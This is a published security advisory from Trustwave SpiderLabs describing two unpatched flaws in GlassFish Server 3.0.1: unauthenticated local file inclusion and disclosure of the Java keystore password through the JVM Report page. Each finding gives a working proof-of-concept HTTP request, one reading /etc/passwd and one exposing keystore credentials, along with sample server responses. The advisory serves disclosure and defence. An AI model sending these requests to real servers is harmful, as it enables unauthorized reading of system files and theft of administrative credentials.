JVM Report

Trustwave SpiderLabs Security Advisory TWSL2016-011:
Multiple Vulnerabilities in Oracle GlassFish Server Open Source Edition 3.0.1

Published: 06/08/2016
Version: 1.0

Vendor: Oracle Corporation
Product: GlassFish Server Open Source Edition
Version affected: 3.0.1 (build 22)

Product description:
GlassFish Server 3.0.1 is built on a modular, flexible runtime based on the 
OSGi standard. It enables organizations to create and deploy Web applications 
with the lightweight Java EE 6 Web Profile and to easily leverage the power of 
the full Java EE 6 platform for enterprise applications. Developers also 
benefit from the simplified programming model and productivity improvements 
offered by Java EE 6. 

The result is a flexible platform that can apply only what is needed to address 
the business problem, thereby reducing cost and complexity. Because GlassFish 
Server 3.0.1 uses a microkernel architecture based on OSGi, developers can 
begin with the Java EE 6 Web Profile and use the Update Center to dynamically 
upgrade to the full Java EE 6 platform!

Finding 1: Local File Inclusion
Credit: Piotr Karolak of Trustwave's SpiderLabs

A vulnerability in GlassFish Server Open Source Edition 3.0.1 (build 22) makes 
it possible to include arbitrary files on the server, this vulnerability can be 
exploited without any prior authentication.

The following PoC (Proof of Concept) demonstrates the vulnerability:

REQUEST
=======
GET /resource/file%3a///etc/passwd/ HTTP/1.1
Host: a.b.c.d:4848
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close


RESPONSE
========
HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish Server Open Source Edition 3.0.1
X-Powered-By: JSF/2.0
Last-Modified: Tue, 05 Jan 2016 08:12:11 GMT
Expires: Mon, 25 Jan 2016 10:33:19 GMT
Content-Type: application/octet-stream
Content-Length: 2243
Date: Tue, 05 Jan 2016 15:55:31 GMT
Connection: close

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

TRUNCATED

glassfish:x:120:65534::/home/glassfish:/bin/bash

Finding 2: Java Key Store Password Disclosure
Credit: Piotr Karolak of Trustwave's SpiderLabs

A vulnerability, which could allow an unauthenticated, remote attacker to 
obtain administrative privileged access to the web interface of the affected 
device. An attacker would be able to exploit this vulnerability by submitting 
TRACE method request. Successful exploitation of this vulnerability could 
provide an unauthenticated attacker plain text password of administrative user 
and grant access to the web-based administration interface.

In case of an authenticated user, a HTTP GET request to the JVM Report page 
will disclose Java Key Store password of The Admin Console and help launch 
further attacks on the affected system.

The following PoC (Proof of Concept) demonstrates the vulnerability:

REQUEST
=======
GET /common/appServer/jvmReport.jsf?pageTitle=JVM%20Report HTTP/1.0
Host: a.b.c.d:4848
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: appServerRegistrationRemindLaterCookie=true; JSESSIONID=355826450d198ee743cefd78558c; treeForm:tree-hi=
Connection: close
Cache-Control: max-age=0


RESPONSE
========
HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish Server Open Source Edition 3.0.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 16:00:00 PST
X-Powered-By: JSF/2.0
Content-Type: text/html;charset=UTF-8
Date: Tue, 05 Jan 2016 20:32:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:wairole="http://www.w3.org/2005/01/wai-rdf/GUIRoleTaxonomy#" xmlns:waistate="http://www.w3.org/2005/07/aaa">
<head>
<meta content="no-cache" http-equiv="Pragma" />
<meta content="no-cache" http-equiv="Cache-Control" />
<meta content="no-store" http-equiv="Cache-Control" />
<meta content="max-age=0" http-equiv="Cache-Control" />
<meta content="1" http-equiv="Expires" />
<title>JVM Report</title>

TRUNCATED

java.vendor.url.bug = http://bugreport.sun.com/bugreport/
java.version = 1.7.0_79
java.vm.info = mixed mode
java.vm.name = OpenJDK 64-Bit Server VM
java.vm.specification.name = Java Virtual Machine Specification
java.vm.specification.vendor = Oracle Corporation
java.vm.specification.version = 1.7
java.vm.vendor = Oracle Corporation
java.vm.version = 24.79-b02
javax.net.ssl.keyStore = /home/glassfish/glassfish/domains/domain1/config/keystore.jks
javax.net.ssl.keyStorePassword = MY-ADMIN-PASSSWORD
javax.net.ssl.trustStore = /home/glassfish/glassfish/domains/domain1/config/cacerts.jks
javax.net.ssl.trustStorePassword = MY-ADMIN-PASSSWORD
javax.rmi.CORBA.PortableRemoteObjectClass = com.sun.corba.ee.impl.javax.rmi.PortableRemoteObject

Remediation Steps:
No official fix is available. However, administrators can mitigate these 
findings with the use of technologies, such as Web Application Firewalls (WAF) 
or Intrusion Prevention Systems (IPS). Often, Vulnerability Scanners and 
Intrusion Detection Systems (IDS) can detect the presence of Local File Inclusion
vulnerabilities and other software weaknesses.


Revision History:
01/07/2016 - Vulnerability disclosed to vendor
04/06/2016 - Exceeded 90 days after date of contact to release a patch
06/01/2016 - Vendor acknowledges findings are not addressed and closes ticket
06/08/2016 - Advisory published

References
1. https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
2. https://glassfish.java.net/downloads/3.0.1-final.html


About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security 
risk. With cloud and managed security services, integrated technologies and a 
team of security experts, ethical hackers and researchers, Trustwave enables 
businesses to transform the way they manage their information security and 
compliance programs. More than three million businesses are enrolled in the 
Trustwave TrustKeeper cloud platform, through which Trustwave delivers 
automated, efficient and cost-effective threat, vulnerability and compliance 
management. Trustwave is headquartered in Chicago, with customers in 96 
countries. For more information about Trustwave, visit 
https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.